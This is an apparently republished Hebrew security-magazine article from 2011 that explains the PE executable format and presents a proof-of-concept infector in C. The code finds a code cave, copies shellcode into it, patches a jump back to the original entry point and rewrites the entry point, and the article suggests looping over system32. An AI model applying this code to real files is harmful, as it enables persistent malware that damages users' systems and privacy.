הדבקה בינארית (Digital Whisper #19 שוחרר)

כתיבת קוד המזריק קוד לכל תוכנה באופן גנרי ("מדביק")

אתמול, באיחור קל, שוחרר הגיליון התשעה עשר של Digital Whisper, המגזין המצוין לאבטחת מידע. כל חודש ביומו האחרון יוצא גיליון חדש עם כתבות מכותבים מתנדבים. שווה לעקוב!

כתבתי מאמר לגיליון זה, תוכנו מובא למטה. כדאי לקרוא ב-DW, במקור 🙂 המאמר מדבר על הדבקה בינארית – 'הזרקת' קוד זדוני לתוך תוכנה לגיטימית בצורה אוטומטית. לחצו על הקישור כדי להמשיך לקרוא.

תודה לאחי שעזר בעריכה הראשונית, ולצוות DW שמקפידים להוציא את הגיליון כל חודש.

הקדמה

ווירוסים ותוכנות ריגול מזיקים הן לחברות והן למשתמש הפרטי מבחינה כלכלית ובפגיעתם בפרטיות. הם משכפלים את עצמם בדרכים רבות, מאזינים לתעבורה ברשת, יכולים להריץ כל פקודה, ומעיקים באופן כללי על טכנאים ארגוניים ועל המשתמש הפרטי.

עבור בונה הווירוס לעומת זאת, הפצת הווירוסים הינה פעולה רווחית מאוד. ווירוסים מאפשרים לגנוב מספרי כרטיסי אשראי, סיסמאות, פרטים אישיים וסודות מסחריים, ליצור Botnet כבסיס להתקפות על שרתים, על אתרים, ובעצם על כל תשתית המחוברת לאינטרנט. נסיבות אלו יוצרות את הצורך של יוצרי הווירוסים ליצור וירוסים שרידים שיישארו על המחשב המותקף את הזמן הארוך ביותר, והאגרסיביים ביותר, שיצליחו להתפשט לכמה שיותר מחשבים נוספים.

ישנם מנגנוני שרידות רבים עבור ווירוסים. אחדים מהם הם:

 • שימוש ב-Rootkit: על מנת להסתיר את הקובץ.
 • שכפול והטעיה: העתקה של הקובץ לתיקיות אקראיות כדי שמשתמש המסייר במחשב יפעיל אותו.
 • הפעלה אוטומטית: הוספה של הווירוס להגדרות הפעלה אוטומטית (בדרכים רבות).

בנוסף למנגנוני השרידות הללו, קיימת שיטה אשר לרוב קשה יותר לזיהוי. דמיינו כמה קשה היה להפטר (ובכלל לגלות) ווירוס שלוקח קובץ תוכנה לגיטימי לחלוטין כמו אחד מקבצי מערכת ההפעלה, ומזריק לתוכו קטע קוד זדוני. כל עוד אין אמצעי אוטומטי שבודק את תקינות הקבצים המשתמש לא יחשוד מכיוון שהוא מכיר את הקובץ המדובר. כעת דמיינו מה היה קורה אם היינו מדביקים כל קובץ אפשרי במערכת. ניקוי כלל קבצי ההפעלה במערכת אינה פעולת טריוויאלית כלל וכלל.

במאמר זה, ננסה לבנות PoC (ר"ת Proof of Concept – בא להראות טכניקה אך לאו דווקא יישום מלא) שייקח קובץ EXE ויזריק לתוכו Shellcode (הקוד הזדוני שלנו) אוטומטית ככה שבכל הפעלה של הקובץ הלגיטימי יופעל גם הקוד שלנו.

רקע לנושא: מבנה קבצי הרצה

לפני שנתחיל צריך להכיר קצת את המטרה. קבצים עם סיומת EXE הם קבצי PE (ר"ת של Portable Executable). זהו פורמט שבו בנויים לא רק קבצי EXE אלא גם קבצי DLL, קבצי sys (דרייברים), CPL (קבצים עבור לוח הבקרה) וקבצים נוספים.

ההבנה של מבנה קובץ ה-PE הינה הכרחית להבנת התהליך, ונתחיל בהסבר בקצרה על מבנה הקובץ.

לפניכם קובץ EXE לדוגמא ומבנה סכמטי של קובץ PE:

PE Structure

הקובץ מחולק לחלקים הבאים:

DOS Header – 64 bytes (IMAGE_DOS_HEADER)
DOS Stub
PE Header – 248 bytes
(IMAGE_NT_HEADERS)
Section Table
(Array of IMAGE_SECTION_HEADER – 40 bytes each)
Section 1
Section 2
Section ..

הקובץ מתחיל במבנה נתונים בשם DOS Header באורך 64 בייטים. המאפיין הבולט ביותר הוא ששני הבייטים הראשונים מכילים 77 ו-90 שהם שני התווים MZ (טריוויה: הם על שמו של מארק זביקובסקי, מתכנן פורמט ה-PE של DOS).

בארבעת הבייטים האחרונים של המבנה, כפי שניתן לראות בדוגמא בחץ הלבן, ישנו מצביע (Pointer) למבנה נתונים שני בשם NT Header שאורכו 248 בייטים. במבנה נתונים זה נמצא כל המידע החשוב לנו (נבחן אותו יותר לעומק בהמשך) וגם אותו קל יחסית לזהות מאחר והוא מתחיל בשני תווים- PE.

ההסבר מדוע יש צורך ב-DOS Header אם אנו לא משתמשים בו ומדוע לא לשים רק את ה-NT Header הינו תאימות, בזכות ה-DOS Header וה-DOS Stub (שגם בו אין לנו שימוש) התוכנה תואמת DOS, מה שאומר שהיא יכולה לרוץ גם תחת DOS. אך במקום להריץ את הקוד הרגיל, היא תריץ את הקוד שנמצא ב-DOS Stub שבד"כ פשוט מציג את ההודעה This program cannot run in DOS mode.

לאחר ה-PE Header נמצאת טבלת המקטעים, ה-Section Table. כל שאר הקובץ מחולק למקטעים (Sections) והמידע על כל מקטע נמצא בטבלת המקטעים. כל איבר בטבלה זו (או במילים אחרות, ברשימה זו) הינו בגודל 40 בייטים והוא נקרא IMAGE_SECTION_HEADER. עבור כל מקטע מפורט מידע לגבי המקטע: היכן בקובץ הוא מתחיל, מה גודלו, האם לתוכנו יש הרשאות לרוץ (execute), ועוד הגדרות נוספות. בדרך כלל קיימים לפחות שני מקטעים, האחד לקוד (עם הרשאות ריצה), הנקרא לרוב text והשני למשאבים כמו תמונות, טקסט, וכן הלאה, אשר נקרא לרוב rsrc. המקטע השני אינו מוגדר עם הרשאות ריצה.

תהליך הזרקת הקוד

עכשיו כשאנו מכירים את המבנה הכללי של הקובץ נוכל למצוא מיקום לכתוב את הקוד שלנו. ישנן כמה שיטות. שיטה אחת שנתקלתי בה היא להוסיף מקטע בסוף הקובץ ובו להכניס את הקוד. הבעיה היא שאנו מגדילים את גודל הקובץ, ויש לנו אינטרס לעשות כמה שפחות שינויים.

למזלנו, בסוף כל מקטע יש קטע ריק שלא בשימוש. גודל המקטעים חייב להיות כפולות של מספר מסוים (FileAlignment) המופיע ב-NT Header. כאשר הקומפיילר והלינקר בונים את הקובץ הם משאירים מקום ריק בסופו (ממולא בד"כ באפסים) עד שיגיע לגודל שהוא כפולה של FileAlignment. לדוגמא, אם FileAlignment הוא 1000h בייטים (4096) ואורך הקוד המקטע הוא 1700h בייטים (5888), גודל המקטע יהיה 2000h (8192). במקרה הזה יהיו לנו 300h בייטים (768) שלא בשימוש שבהם נכתוב את הקוד שלנו. כתיבת קוד בתוך מקטע שלא בשימוש נקראת מערת קוד (Code Cave).

חשוב לציין: כאשר מוצאים מקום ריק צריך לוודא שלמקטע זה יש הרשאות ריצה. כלומר לוודא שכאשר ייטען תוכן המקטע לזיכרון יסומן הקטע כמכיל קוד להרצה. אם נכניס את הקוד שלנו למקטע ללא הרשאות ריצה הקוד פשוט לא יוכל לרוץ. ניתן לשנות את הגדרות המקטע כך שתהיינה לו הרשאות ריצה, ואז ניתן יהיה להשתמש בו למרות שבמקור הוא היה מונע הרצה.

גם מציאת מקום פנוי וכתיבת הקוד שלנו בו אין בה עדיין מספיק על מנת שהקוד שלנו ירוץ בעת הרצת הקובץ. הקוד ימצא בזיכרון, אך התוכנה בזמן ריצתה לעולם לא תגיע אליו. היא מתחילה לרוץ בכתובת אחרת ואף פעם אין קפיצה (JMP ב-x86) אל מערת הקוד שלנו. נצטרך לגרום לתוכנה להגיע לקוד שלנו.

הרעיון הראשוני שנבחן היה החלפה של הקוד שנמצא בשורות הראשונות ב-EP (היא ה-Entry Point, כתובת הפקודה הראשונה שבה התוכנה מתחילה לרוץ). אנו נחליף אותו בקפיצה (JMP) למערת הקוד שלנו. ובסוף מערת הקוד נכניס את הפקודות שהיו לפני כן ב-EP ונקפוץ חזרה אל מיד אחרי ה-JMP שהכנסנו ב-EP (השיטה הודגמה בסוף המאמר "שולים מוקשים" ביתר הרחבה).

במקרה זה נתקלתי בבעיה בשימוש בשיטה זו. כדי להעתיק את הפקודות מה-EP חייבים לדעת את אורכן, כי כל פקודת אסמבלי תופסת מספר שונה של בייטים. פקודת NOP לדוגמה תופסת בייט בודד, לעומת JMP שתופסת חמשה בייטים). כדי להעתיק את הפקודה בשלמותה וכדי לא לחתוך אותה חייבים לזהות איזו פקודה זו- ולכן יש צורך בכתיבת Disassembler בסיסי (Length-Disassembler ליתר דיוק) שיוכל לזהות את אורכן של הפקודות.

Code Cave Diagram

לכן, החלטתי לנסות פתרון פשוט יותר לקפיצה לקוד שלנו: שינוי ערך ה-Entry Point, במקום שיצביע לתחילת התוכנה נשנה אותו כך שיצביע למערת הקוד שלנו. בסוף המערה נוסיף JMP ל-OEP (ר"ת Original Entry Point – נקודת הכניסה המקורית) כך הקוד שלנו ירוץ ראשון, ומיד אחריו התוכנה תמשיך בפעולתה הרגילה כאילו כלום לא קרה.

נסכם את השלבים:

 1. עבור כל מקטע: חפש מקום פנוי גדול מספיק בשביל המערה
 2. כתוב את הקוד במערה
 3. הוסף את ה-JMP בסוף המערה אל ה-OEP
 4. שנה את ה-EP לכתובת של המערה שלנו

מימוש השיטה

נתחיל בגישה אל הקובץ. במקום להשתמש בקריאה וכתיבה רגילים מקובץ החלטתי להשתמש ב-File Mapping – מיפוי תוכן קובץ למרחב הזיכרון שלנו, כך שכל קריאה וכתיבה מהקובץ תתבצע ע"י ידי קריאה וכתיבה למשתנים וכתובות. בהמשך תוכלו לראות עד כמה זה מקל על עריכת הקובץ. מידע נוסף על מיפוי קבצים בזיכרון ווירטואלי ניתן למצוא בוויקפדיה (תאורטי), MSDN או בהדגמה.

HANDLE fileHandle = CreateFile(file, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
HANDLE fileMapHandle = CreateFileMapping(fileHandle, NULL, PAGE_READWRITE, 0, 0, 0);
char *fileContents = (char*)MapViewOfFile(fileMapHandle, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);

בשורה הראשונה אנו מקבלים Handle אל הקובץ (שימו לב שאנו מבקשים הרשאות כתיבה). בשורה השניה אנו יוצרים את אובייקט המיפוי ובשלישית ממפים לתחום הזיכרון שלנו ומקבלים את המצביע (Pointer) למקום שאליו מערכת ההפעלה מיפתה את הקובץ. אנו ממירים את המצביע למצביע ל-char כדי שיהיה נוח לעבוד איתו (מכיוון ש-char במקרה הזה הינו בגודל בייט בודד).

כמו שראיתם בתרשים שבתחילת המאמר, קובץ PE מתחיל ב-DOS Header, ו-fileContents מצביע אל תחילת הקובץ. זה אומר ש-fileContents בעצם מצביע ל-DOS Header. כל מה שנשאר זה להודיע לקומפיילר את זה (ב-Windows SDK ה-DOS Header נקרא IMAGE_DOS_HEADER) בצורה הבאה:

IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER*)fileContents;

ועכשיו אנו יכולים לגשת לכל אחד מאיברי המבנה. אם אתם זוכרים אמרנו שארבעת הבייטים האחרונים הם מצביע ל-NT Header. הציצו במבנה ותראו שהאיבר האחרון נקרא e_lfanew והוא המצביע ל-NT Header (ב-SDK הוא נקרא IMAGE_NT_HEADERS) ולכן, פשוט נלך לאן שהמצביע מצביע וכמו קודם נגיד לקומפיילר שהוא IMAGE_NT_HEADERS:

IMAGE_NT_HEADERS *ntHeader = (IMAGE_NT_HEADERS*)(fileContents + dosHeader->e_lfanew);

(אנו לוקחים את המיקום של הקובץ בזיכרון + המצביע)

בפרק הקודם סיכמנו את השלבים, והשלב הראשון היה "עבור כל מקטע: חפש מקום פנוי גדול מספיק בשביל המערה". כלומר, אנו צריכים למצוא את הטבלה של המקטעים. על פי התרשים בתחילת המאמר הטבלה נמצאת מיד אחרי ה-NT Header, אז כדי להגיע אליה פשוט 'נקפוץ' מעליו:

IMAGE_SECTION_HEADER *section = (IMAGE_SECTION_HEADER*)((char*)ntHeader + sizeof(IMAGE_NT_HEADERS));

הוספנו את גודל ה-NT Header, וכעת אנו מייד אחריו, במקטע הראשון שמופיע ב-Section Table. עכשיו נצטרך לעבור על המקטעים אחד אחד עד שנמצא מקום מתאים. ב-NT Header יש לנו את מספר המקטעים (NumberOfSections), ולכן הלולאה פשוטה ביותר:

for (int i = 0; i < ntHeader->FileHeader.NumberOfSections; i++, section++)

עבור כל מקטע נצטרך לוודא שיש לו הרשאות ריצה:

if (section->Characteristics & IMAGE_SCN_MEM_EXECUTE)

ואם אכן קיימות הרשאות ריצה, המקטע הזה הינו התאמה פוטנציאלית. אנו מוכנים להתחיל לעבור עליו. הסתכלו ב-MSDN ותראו את PointerToRawData – כתובת התחלת המקטע, ו-SizeOfRawData – גודל המקטע. זה מספיק לנו כדי למצוא מקום ריק במקטע.

// Iterate through each byte and find enough
// consecutive 00 bytes
char *current = fileContents + section->PointerToRawData;
for (DWORD i = 0; i < section->SizeOfRawData; i++, current++) // For each byte
{
	DWORD caveSizeCounter = 0;
	while (*current == 0) // While it is still 00
		caveSizeCounter++, i++, current++;

	// If it bigger than these 3 summed:
	// * SAFE_DIST - 4 bytes - a safe distance so we don't overwrite other commands' parameters
	// * shellCodeLen - the shell code length
	// * JMP_LEN - 5 bytes - the size of the JMP instruction to the OEP
	if (caveSizeCounter >= SAFE_DIST+shellCodeLen+JMP_LEN)
	{
		caveSizeCounter -= SAFE_DIST; // Make sure we're not in the middle of an instruction
		if (!caveFound) // If still we didn't find any cave
		{
			caveFound = true;
			caveLoc = i - caveSizeCounter;
			caveSize = caveSizeCounter;
			caveSection = section;
		}
	}
}

אנו רצים מתחילת PointerToRawData בייטים כמספר SizeOfRawData ומחפשים מספיק בייטים רצופים השווים ל-00. מספיק = SAFE_DIST+shellCodeLen+JMP_LEN. אורך הקוד + הקפיצה ל-OEP + מרחק ביטחון. מכיוון שאנו לא יכולים לדעת מה אורך ההוראה (כפי שכתבתי בתחילת מאמר זה) אנו לוקחים 'מרחק ביטחון' של 4 בייטים כדי להבטיח שאנו לא עולים על פקודה אחרת (המסתיימת בבייטים השווים ל-00). ארבעת השורות המודגשות רצות כאשר מצאנו מקום מספיק גדול – אנו שומרים את המיקום, הגודל והמקטע שבו מצאנו את המערה.

מצאנו את המערה!

כעת נשאר לנו השלב השני – "כתוב את הקוד במערה":

// Dig it! :)
char *cavePtr = fileContents + caveSection->PointerToRawData + caveLoc;
memcpy(cavePtr, shellCode, shellCodeLen); // Writing the shellcode

מיקום המערה (cavePtr) הוא סכום של שלושה גורמים: הכתובת שאליה מופה הקובץ + מיקום המקטע בקובץ + מיקום המערה במקטע. בשורה השניה אנו מעתיקים את הקוד לתוך המערה. זה הכל.

כעת נעבור לשלב הבא: "הוסף את ה-JMP בסוף המערה אל ה-OEP". התחביר של JMP Near הוא:

E9 XX XX XX XX

כאשר ארבעת ה-XX הם המרחק בין ההוראה הבאה (שאחרי ה-JMP) לבין המקום שאליו רוצים לקפוץ (ה-OEP במקרה שלנו):

*(cavePtr++) = 0xE9; // JMP opcode
*(DWORD*)cavePtr = (ULONG32)(ntHeader->OptionalHeader.AddressOfEntryPoint - (caveSection->VirtualAddress + caveLoc + shellCodeLen + 5)); // Jump relative address

כפי שניתן לראות, הכתובת הנוכחית מחושבת כך: הכתובת שאליה ימופה המקטע (VirtualAddress) + מיקום המערה במקטע + אורך הקוד + גודל ה-JMP. במילים אחרות: הכתובת שאליה אנו קופצים (ה-EP הנוכחי) מינוס הכתובת שמייד אחרי ה-JMP.

לפני שנעבור לשלב הבא יש לתקן בעיה קטנה: יש סיכוי סביר שהמערה נמצאת בסוף המקטע, מה שאומר שכתבנו בקטע שלא נכלל לפני זה במקטע (על פי המאפיין VirtualSize של המקטע), ולכן, אם זה המקרה נגדיל אותו שיכלול גם את המערה שלנו:

DWORD neededSize = caveLoc + shellCodeLen + 5 + 1;
if (caveSection->Misc.VirtualSize <= neededSize)
	caveSection->Misc.VirtualSize = neededSize;

כעת, נעבור לשלב האחרון: "שנה את ה-EP לכתובת של המערה שלנו". ואת זה נעשה בשורה אחת פשוטה:

ntHeader->OptionalHeader.AddressOfEntryPoint = caveSection->VirtualAddress + caveLoc;

ה-EP החדש של התוכנה יהיה מעכשיו המערה שלנו שממוקמת במיקום המקטע בזיכרון + מיקום המערה במקטע.

זה הכל! טכניקה זו, בתוספת לולאה קטנה שתעבור על כל הקבצים, נניח, בתיקיה system32, מקשה מאוד על הזיהוי הניקוי של וירוס שפועל בצורה זו.

PE Infection - Demonstration

סיכום

הדבקה מסיבית של הרבה קבצים בקוד זדוני מקשה מאוד על הסרתו. בעזרת File Mapping וארבעה צעדים פשוטים:

 1. עבור כל מקטע: חפש מקום פנוי גדול מספיק בשביל המערה
 2. כתוב את הקוד במערה
 3. הוסף את ה-JMP בסוף המערה אל ה-OEP
 4. שנה את ה-EP לכתובת של המערה שלנו

הדגמנו הדבקה של קובץ תוכנה בודד בקוד זדוני (Shellcode).

כדי לראות את התהליך בשלמותו ולקבל תמונה כוללת מומלץ להסתכל בקוד המקור המצורף למאמר זה, ניתן להוריד אותו מהקישור הבא: main.cpp

הקוד כולל בדיקת שגיאות ו-Shellcode לדוגמה שפותח את המחשבון ב-Windows XP SP3. ניתן למצוא קודים אחרים באתרים כדוגמת:

קטגוריות: אבטחת מידע, מערכות הפעלה, תכנות
תגיות: , , , , ,
פורסם בתאריך 2nd אפריל 2011 ע"י vbCrLf